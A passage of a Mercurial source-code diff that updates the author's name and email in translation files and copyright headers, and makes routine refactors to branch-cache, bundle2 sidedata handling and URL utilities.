+"Copyright (C) 2005-2016 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30293,12 +30293,12 @@ "----------------------------------" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" msgstr "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -30471,13 +30471,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30519,8 +30519,8 @@ "====\n" "本マニュアルページの著者は Vadim Gelfer <vadim.gelfer@gmail.com> です。" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial の著者は Matt Mackall <mpm@selenic.com> です。" +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial の著者は Olivia Mackall <olivia@selenic.com> です。" msgid "" "See Also\n" @@ -30536,14 +30536,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "=======\n" "本マニュアルページの著作権は copyright 2006 Vadim Gelfer です。\n" -"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n" +"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30825,14 +30825,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "=======\n" "本マニュアルの著作権は copyright 2005 Bryan O'Sullivan です。\n" -"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n" +"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -39790,13 +39790,13 @@ #~ msgid "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Free use of this software is granted under the terms of the GNU General\n" #~ "Public License version 2 or any later version." #~ msgstr "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" #~ "Public License の元での自由な利用が保証されています。" diff --git a/i18n/pt_BR.po b/i18n/pt_BR.po --- a/i18n/pt_BR.po +++ b/i18n/pt_BR.po @@ -1,6 +1,6 @@ # Brazilian Portuguese translations for Mercurial # Traduções do Mercurial para português do Brasil -# Copyright (C) 2011 Matt Mackall and others +# Copyright (C) 2011 Olivia Mackall and others # # Translators: # Diego Oliveira <diego@diegooliveira.com> @@ -19269,11 +19269,11 @@ msgstr "(veja https://mercurial-scm.org para mais informações)" msgid "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2018 Matt Mackall e outros\n" +"Copyright (C) 2005-2018 Olivia Mackall e outros\n" "Este software é livre; veja os fontes para condições de cópia. Não\n" "há garantias, nem mesmo de adequação para qualquer propósito em\n" "particular.\n" @@ -31340,11 +31340,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "Autor\n" "\"\"\"\"\"\n" -"Escrito por Matt Mackall <mpm@selenic.com>" +"Escrito por Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -31367,13 +31367,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31396,12 +31396,12 @@ "----------------------------------------------------" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" msgstr "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -31581,13 +31581,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31629,8 +31629,8 @@ "=====\n" "Vadim Gelfer <vadim.gelfer@gmail.com>" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial foi escrito por Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial foi escrito por Olivia Mackall <olivia@selenic.com>." msgid "" "See Also\n" @@ -31645,14 +31645,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "=====\n" "Esta página de manual: copyright 2006 Vadim Gelfer.\n" -"Mercurial: copyright 2005-2018 Matt Mackall.\n" +"Mercurial: copyright 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31928,14 +31928,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "=====\n" "Esta página de manual: copyright 2005 Bryan O'Sullivan.\n" -"Mercurial: copyright 2005-2018 Matt Mackall.\n" +"Mercurial: copyright 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -41308,13 +41308,13 @@ #~ msgid "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Free use of this software is granted under the terms of the GNU General\n" #~ "Public License version 2 or any later version." #~ msgstr "" #~ "Cópia\n" #~ "\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Garante-se livre uso deste software nos termos da licença\n" #~ "GNU General Public License, versão 2 ou qualquer versão posterior." diff --git a/i18n/ro.po b/i18n/ro.po --- a/i18n/ro.po +++ b/i18n/ro.po @@ -1,7 +1,7 @@ # Romanian translation for Mercurial # Traducerea în limba română pentru Mercurial # -# Copyright (C) 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2010 Olivia Mackall <olivia@selenic.com> and others # # # Glosar de traduceri @@ -10032,11 +10032,11 @@ msgstr "(vezi http://mercurial.selenic.com pentru mai multe informații)" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall și alții\n" +"Copyright (C) 2005-2011 Olivia Mackall și alții\n" "Acesta este software liber; vezi sursa pentru condițiile de copiere.\n" "Nu există NICIO garanție; nici măcar pentru COMERCIALIZARE sau\n" "COMPATIBILITATE ÎN ANUMITE SCOPURI.\n" diff --git a/i18n/ru.po b/i18n/ru.po --- a/i18n/ru.po +++ b/i18n/ru.po @@ -1,5 +1,5 @@ # Russian translations for Mercurial package. -# Copyright (C) 2011 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2011 Olivia Mackall <olivia@selenic.com> and others # This file is distributed under the same license as the Mercurial package. # === Glossary === # @@ -15590,11 +15590,11 @@ msgstr "(подробнее см. http://mercurial.selenic.com)" msgid "" -"Copyright (C) 2005-2014 Matt Mackall and others\n" +"Copyright (C) 2005-2014 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"(С) 2005-2014 Matt Mackall и другие.\n" +"(С) 2005-2014 Olivia Mackall и другие.\n" "Это свободное ПО; условия распространения см. в исходном коде.\n" "НИКАКИХ ГАРАНТИЙ НЕ ПРЕДОСТАВЛЯЕТСЯ, в том числе на пригодность для\n" "коммерческого использования и для решения конкретных задач.\n" @@ -21807,7 +21807,7 @@ # NOT SURE should this be translated? msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -22000,11 +22000,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "Автор\n" "\"\"\"\"\"\n" -"Matt Mackall <mpm@selenic.com>" +"Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -22024,13 +22024,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2014 Matt Mackall.\n" +"Copyright (C) 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "\"\"\"\"\"\"\"\"\"\"\"\n" -"(C) 2005-2014 Matt Mackall.\n" +"(C) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." @@ -22068,8 +22068,8 @@ "=====\n" "Vadim Gelfer <vadim.gelfer@gmail.com>" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial написан Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial написан Olivia Mackall <olivia@selenic.com>." msgid "" "See Also\n" @@ -22084,14 +22084,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "===========\n" "Правами на данную страницу обладает (с) 2006 Vadim Gelfer\n" -"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n" +"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." @@ -22346,14 +22346,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "===========\n" "Правами на данную страницу обладает (с) 2005 Bryan O'Sullivan\n" -"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n" +"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." diff --git a/i18n/sv.po b/i18n/sv.po --- a/i18n/sv.po +++ b/i18n/sv.po @@ -1,6 +1,6 @@ # Swedish translation for Mercurial # Svensk översättning för Mercurial -# Copyright (C) 2009-2012 Matt Mackall and others +# Copyright (C) 2009-2012 Olivia Mackall and others # # Translation dictionary: # @@ -12413,11 +12413,11 @@ msgstr "(se http://mercurial.selenic.com för mer information)" msgid "" -"Copyright (C) 2005-2012 Matt Mackall and others\n" +"Copyright (C) 2005-2012 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2012 Matt Mackall och andra\n" +"Copyright (C) 2005-2012 Olivia Mackall och andra\n" "Detta är fri mjukvara; se källkoden för kopieringsvillkor. Det ges INGEN\n" "garanti; inte ens för SÄLJBARHET eller ATT PASSA FÖR ETT VISST ÄNDAMÅL.\n" diff --git a/i18n/zh_CN.po b/i18n/zh_CN.po --- a/i18n/zh_CN.po +++ b/i18n/zh_CN.po @@ -7409,12 +7409,12 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" "\n" -"版权所有 (C) 2005-2010 Matt Mackall <mpm@selenic.com> 和其他人。\n" +"版权所有 (C) 2005-2010 Olivia Mackall <olivia@selenic.com> 和其他人。\n" "这是自由软件,具体参见版权条款。这里没有任何担保,甚至没有适合\n" "特定目的的隐含的担保。\n" diff --git a/i18n/zh_TW.po b/i18n/zh_TW.po --- a/i18n/zh_TW.po +++ b/i18n/zh_TW.po @@ -1,5 +1,5 @@ # Traditional Chinese translation for Mercurial -# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others # This file is distributed under the same license as the Mercurial package. # Chia-Huan Wu <willie.tw@gmail.com>, 2009. # @@ -8191,7 +8191,7 @@ msgstr "\tSee 'hg help urls' for more information." msgid "" -"Copyright (C) 2005-2010 Matt Mackall and others\n" +"Copyright (C) 2005-2010 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" diff --git a/mercurial/ancestor.py b/mercurial/ancestor.py --- a/mercurial/ancestor.py +++ b/mercurial/ancestor.py @@ -1,6 +1,6 @@ # ancestor.py - generic DAG ancestor algorithm for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/bdiff.c b/mercurial/bdiff.c --- a/mercurial/bdiff.c +++ b/mercurial/bdiff.c @@ -1,7 +1,7 @@ /* bdiff.c - efficient binary diff extension for Mercurial - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/bitmanipulation.h b/mercurial/bitmanipulation.h --- a/mercurial/bitmanipulation.h +++ b/mercurial/bitmanipulation.h @@ -5,6 +5,18 @@ #include "compat.h" +/* Reads a 64 bit integer from big-endian bytes. Assumes that the data is long + enough */ +static inline uint64_t getbe64(const char *c) +{ + const unsigned char *d = (const unsigned char *)c; + + return ((((uint64_t)d[0]) << 56) | (((uint64_t)d[1]) << 48) | + (((uint64_t)d[2]) << 40) | (((uint64_t)d[3]) << 32) | + (((uint64_t)d[4]) << 24) | (((uint64_t)d[5]) << 16) | + (((uint64_t)d[6]) << 8) | (d[7])); +} + static inline uint32_t getbe32(const char *c) { const unsigned char *d = (const unsigned char *)c; @@ -27,6 +39,20 @@ return ((d[0] << 8) | (d[1])); } +/* Writes a 64 bit integer to bytes in a big-endian format. + Assumes that the buffer is long enough */ +static inline void putbe64(uint64_t x, char *c) +{ + c[0] = (x >> 56) & 0xff; + c[1] = (x >> 48) & 0xff; + c[2] = (x >> 40) & 0xff; + c[3] = (x >> 32) & 0xff; + c[4] = (x >> 24) & 0xff; + c[5] = (x >> 16) & 0xff; + c[6] = (x >> 8) & 0xff; + c[7] = (x)&0xff; +} + static inline void putbe32(uint32_t x, char *c) { c[0] = (x >> 24) & 0xff; diff --git a/mercurial/bookmarks.py b/mercurial/bookmarks.py --- a/mercurial/bookmarks.py +++ b/mercurial/bookmarks.py @@ -27,6 +27,9 @@ txnutil, util, ) +from .utils import ( + urlutil, +) # label constants # until 3.5, bookmarks.current was the advertised name, not @@ -597,10 +600,10 @@ # try to use an @pathalias suffix # if an @pathalias already exists, we overwrite (update) it if path.startswith(b"file:"): - path = util.url(path).path + path = urlutil.url(path).path for p, u in ui.configitems(b"paths"): if u.startswith(b"file:"): - u = util.url(u).path + u = urlutil.url(u).path if path == u: return b'%s@%s' % (b, p) @@ -623,7 +626,7 @@ _binaryentry = struct.Struct(b'>20sH') -def binaryencode(bookmarks): +def binaryencode(repo, bookmarks): """encode a '(bookmark, node)' iterable into a binary stream the binary format is: @@ -645,7 +648,7 @@ return b''.join(binarydata) -def binarydecode(stream): +def binarydecode(repo, stream): """decode a binary stream into an '(bookmark, node)' iterable the binary format is: diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -1,6 +1,6 @@ # branchmap.py - logic to computes, maintain and stores branchmap for local repo # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -39,6 +39,7 @@ Tuple, Union, ) + from . import localrepo assert any( ( @@ -51,6 +52,7 @@ Set, Tuple, Union, + localrepo, ) ) @@ -97,7 +99,7 @@ revs.extend(r for r in extrarevs if r <= bcache.tiprev) else: # nothing to fall back on, start empty. - bcache = branchcache() + bcache = branchcache(repo) revs.extend(cl.revs(start=bcache.tiprev + 1)) if revs: @@ -129,6 +131,7 @@ if rbheads: rtiprev = max((int(clrev(node)) for node in rbheads)) cache = branchcache( + repo, remotebranchmap, repo[rtiprev].node(), rtiprev, @@ -184,6 +187,7 @@ def __init__( self, + repo, entries=(), tipnode=nullid, tiprev=nullrev, @@ -191,10 +195,11 @@ closednodes=None, hasnode=None, ): - # type: (Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None + # type: (localrepo.localrepository, Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None """hasnode is a function which can be used to verify whether changelog has a given node or not. If it's not provided, we assume that every node we have exists in changelog""" + self._repo = repo self.tipnode = tipnode self.tiprev = tiprev self.filteredhash = filteredhash @@ -280,6 +285,7 @@ if len(cachekey) > 2: filteredhash = bin(cachekey[2]) bcache = cls( + repo, tipnode=last, tiprev=lrev, filteredhash=filteredhash, @@ -386,6 +392,7 @@ def copy(self): """return an deep copy of the branchcache object""" return type(self)( + self._repo, self._entries, self.tipnode, self.tiprev, @@ -564,6 +571,7 @@ # [4 byte hash prefix][4 byte branch name number with sign bit indicating open] _rbcrecfmt = b'>4sI' _rbcrecsize = calcsize(_rbcrecfmt) +_rbcmininc = 64 * _rbcrecsize _rbcnodelen = 4 _rbcbranchidxmask = 0x7FFFFFFF _rbccloseflag = 0x80000000 @@ -703,8 +711,10 @@ self._setcachedata(rev, reponode, branchidx) return b, close - def setdata(self, branch, rev, node, close): + def setdata(self, rev, changelogrevision): """add new data information to the cache""" + branch, close = changelogrevision.branchinfo + if branch in self._namesreverse: branchidx = self._namesreverse[branch] else: @@ -713,7 +723,7 @@ self._namesreverse[branch] = branchidx if close: branchidx |= _rbccloseflag - self._setcachedata(rev, node, branchidx) + self._setcachedata(rev, self._repo.changelog.node(rev), branchidx) # If no cache data were readable (non exists, bad permission, etc) # the cache was bypassing itself by setting: # @@ -728,11 +738,15 @@ if rev == nullrev: return rbcrevidx = rev * _rbcrecsize - if len(self._rbcrevs) < rbcrevidx + _rbcrecsize: - self._rbcrevs.extend( - b'\0' - * (len(self._repo.changelog) * _rbcrecsize - len(self._rbcrevs)) - ) + requiredsize = rbcrevidx + _rbcrecsize + rbccur = len(self._rbcrevs) + if rbccur < requiredsize: + # bytearray doesn't allocate extra space at least in Python 3.7. + # When multiple changesets are added in a row, precise resize would + # result in quadratic complexity. Overallocate to compensate by + # use the classic doubling technique for dynamic arrays instead. + # If there was a gap in the map before, less space will be reserved. + self._rbcrevs.extend(b'\0' * max(_rbcmininc, requiredsize)) pack_into(_rbcrecfmt, self._rbcrevs, rbcrevidx, node, branchidx) self._rbcrevslen = min(self._rbcrevslen, rev) diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -177,7 +177,10 @@ url, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -1598,7 +1601,6 @@ b'digests': tuple(sorted(util.DIGESTS.keys())), b'remote-changegroup': (b'http', b'https'), b'hgtagsfnodes': (), - b'rev-branch-cache': (), b'phases': (b'heads',), b'stream': (b'v2',), } @@ -1643,6 +1645,9 @@ # Else always advertise support on client, because payload support # should always be advertised. + # b'rev-branch-cache is no longer advertised, but still supported + # for legacy clients. + return caps @@ -1769,7 +1774,7 @@ for node in outgoing.ancestorsof: # Don't compute missing, as this may slow down serving. fnode = cache.getfnode(node, computemissing=False) - if fnode is not None: + if fnode: chunks.extend([node, fnode]) if chunks: @@ -1810,6 +1815,28 @@ return params +def format_remote_wanted_sidedata(repo): + """Formats a repo's wanted sidedata categories into a bytestring for + capabilities exchange.""" + wanted = b"" + if repo._wanted_sidedata: + wanted = b','.join( + pycompat.bytestr(c) for c in sorted(repo._wanted_sidedata) + ) + return wanted + + +def read_remote_wanted_sidedata(remote): + sidedata_categories = remote.capable(b'exp-wanted-sidedata') + return read_wanted_sidedata(sidedata_categories) + + +def read_wanted_sidedata(formatted): + if formatted: + return set(formatted.split(b',')) + return set() + + def addpartbundlestream2(bundler, repo, **kwargs): if not kwargs.get('stream', False): return @@ -1955,6 +1982,7 @@ b'version', b'nbchanges', b'exp-sidedata', + b'exp-wanted-sidedata', b'treemanifest', b'targetphase', ), @@ -1997,11 +2025,15 @@ targetphase = inpart.params.get(b'targetphase') if targetphase is not None: extrakwargs['targetphase'] = int(targetphase) + + remote_sidedata = inpart.params.get(b'exp-wanted-sidedata') + extrakwargs['sidedata_categories'] = read_wanted_sidedata(remote_sidedata) + ret = _processchangegroup( op, cg, tr, - b'bundle2', + op.source, b'bundle2', expectedtotal=nbchangesets, **extrakwargs @@ -2044,7 +2076,7 @@ raw_url = inpart.params[b'url'] except KeyError: raise error.Abort(_(b'remote-changegroup: missing "%s" param') % b'url') - parsed_url = util.url(raw_url) + parsed_url = urlutil.url(raw_url) if parsed_url.scheme not in capabilities[b'remote-changegroup']: raise error.Abort( _(b'remote-changegroup does not support %s urls') @@ -2081,9 +2113,9 @@ cg = exchange.readbundle(op.repo.ui, real_part, raw_url) if not isinstance(cg, changegroup.cg1unpacker): raise error.Abort( - _(b'%s: not a bundle version 1.0') % util.hidepassword(raw_url) + _(b'%s: not a bundle version 1.0') % urlutil.hidepassword(raw_url) ) - ret = _processchangegroup(op, cg, tr, b'bundle2', b'bundle2') + ret = _processchangegroup(op, cg, tr, op.source, b'bundle2') if op.reply is not None: # This is definitely not the final form of this # return. But one need to start somewhere. @@ -2097,7 +2129,7 @@ except error.Abort as e: raise error.Abort( _(b'bundle at %s is corrupted:\n%s') - % (util.hidepassword(raw_url), e.message) + % (urlutil.hidepassword(raw_url), e.message) ) assert not inpart.read() @@ -2117,7 +2149,7 @@ contains binary encoded (bookmark, node) tuple. If the local state does not marks the one in the part, a PushRaced exception is raised """ - bookdata = bookmarks.binarydecode(inpart) + bookdata = bookmarks.binarydecode(op.repo, inpart) msgstandard = ( b'remote repository changed while pushing - please try again ' @@ -2347,7 +2379,7 @@ When mode is 'records', the information is recorded into the 'bookmarks' records of the bundle operation. This behavior is suitable for pulling. """ - changes = bookmarks.binarydecode(inpart) + changes = bookmarks.binarydecode(op.repo, inpart) pushkeycompat = op.repo.ui.configbool( b'server', b'bookmarks-pushkey-compat' @@ -2478,35 +2510,10 @@ @parthandler(b'cache:rev-branch-cache') def handlerbc(op, inpart): - """receive a rev-branch-cache payload and update the local cache - - The payload is a series of data related to each branch - - 1) branch name length - 2) number of open heads - 3) number of closed heads - 4) open heads nodes - 5) closed heads nodes - """ - total = 0 - rawheader = inpart.read(rbcstruct.size) - cache = op.repo.revbranchcache() - cl = op.repo.unfiltered().changelog - while rawheader: - header = rbcstruct.unpack(rawheader) - total += header[1] + header[2] - utf8branch = inpart.read(header[0]) - branch = encoding.tolocal(utf8branch) - for x in pycompat.xrange(header[1]): - node = inpart.read(20) - rev = cl.rev(node) - cache.setdata(branch, rev, node, False) - for x in pycompat.xrange(header[2]): - node = inpart.read(20) - rev = cl.rev(node) - cache.setdata(branch, rev, node, True) - rawheader = inpart.read(rbcstruct.size) - cache.write() + """Legacy part, ignored for compatibility with bundles from or + for Mercurial before 5.7. Newer Mercurial computes the cache + efficiently enough during unbundling that the additional transfer + is unnecessary.""" @parthandler(b'pushvars') @@ -2561,8 +2568,6 @@ for r in repo.revs(b"::%ln", common): commonnodes.add(cl.node(r)) if commonnodes: - # XXX: we should only send the filelogs (and treemanifest). user - # already has the changelog and manifest packer = changegroup.getbundler( cgversion, repo, @@ -2584,5 +2589,7 @@ part.addparam(b'treemanifest', b'1') if b'exp-sidedata-flag' in repo.requirements: part.addparam(b'exp-sidedata', b'1') + wanted = format_remote_wanted_sidedata(repo) + part.addparam(b'exp-wanted-sidedata', wanted) return bundler diff --git a/mercurial/bundlecaches.py b/mercurial/bundlecaches.py --- a/mercurial/bundlecaches.py +++ b/mercurial/bundlecaches.py @@ -9,6 +9,7 @@ from . import ( error, + requirements as requirementsmod, sslutil, util, ) @@ -164,7 +165,7 @@ compression = spec version = b'v1' # Generaldelta repos require v2. - if b'generaldelta' in repo.requirements: + if requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements: version = b'v2' # Modern compression engines require v2. if compression not in _bundlespecv1compengines: diff --git a/mercurial/bundlerepo.py b/mercurial/bundlerepo.py --- a/mercurial/bundlerepo.py +++ b/mercurial/bundlerepo.py @@ -43,6 +43,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) class bundlerevlog(revlog.revlog): @@ -61,7 +64,7 @@ self.repotiprev = n - 1 self.bundlerevs = set() # used by 'bundle()' revset expression for deltadata in cgunpacker.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata size = len(delta) start = cgunpacker.tell() - size @@ -175,9 +178,15 @@ class bundlemanifest(bundlerevlog, manifest.manifestrevlog): def __init__( - self, opener, cgunpacker, linkmapper, dirlogstarts=None, dir=b'' + self, + nodeconstants, + opener, + cgunpacker, + linkmapper, + dirlogstarts=None, + dir=b'', ): - manifest.manifestrevlog.__init__(self, opener, tree=dir) + manifest.manifestrevlog.__init__(self, nodeconstants, opener, tree=dir) bundlerevlog.__init__( self, opener, self.indexfile, cgunpacker, linkmapper ) @@ -192,6 +201,7 @@ if d in self._dirlogstarts: self.bundle.seek(self._dirlogstarts[d]) return bundlemanifest( + self.nodeconstants, self.opener, self.bundle, self._linkmapper, 